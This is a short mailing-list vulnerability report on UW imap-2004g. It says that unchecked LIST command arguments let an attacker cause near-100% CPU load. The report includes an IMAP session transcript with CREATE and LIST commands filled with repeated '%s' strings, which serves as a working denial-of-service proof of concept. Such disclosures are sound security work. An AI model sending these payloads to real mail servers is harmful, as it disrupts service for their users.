Vulnerability report. Product: UW imap-2004g
Risk: high Vulnerability type: remote Description: Vulnerability exists due to insufficient checking of LIST command arguments in IMAP service. Effect: Malefactor can cause ~100% processor load on a vulnerable system. Vulnerability usage example: * OK [CAPABILITY IMAP4REV1 LITERAL+ SASL-IR LOGIN-REFERRALS AUTH=PLAIN AUTH=LOGIN] localhost IMAP4rev1 2004.357 at Fri, 25 Nov 2005 15:47:18 +0200 (EET) 0001 login test 1234 0001 OK [CAPABILITY IMAP4REV1 LITERAL+ IDLE NAMESPACE MAILBOX-REFERRALS BINARY UNSELECT SCAN SORT THREAD=REFERENCES THREAD=ORDEREDSUBJECT MULTIAPPEND] User test authenticated 0002 CREATE "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" 0002 OK CREATE completed 0003 LIST "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" "%s%s%s%s%s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s% s%s%s%s%s%s%s" -- Best regards, Igor mailto:[EMAIL PROTECTED] _______________________________________________ Imap-uw mailing list [email protected] https://mailman1.u.washington.edu/mailman/listinfo/imap-uw
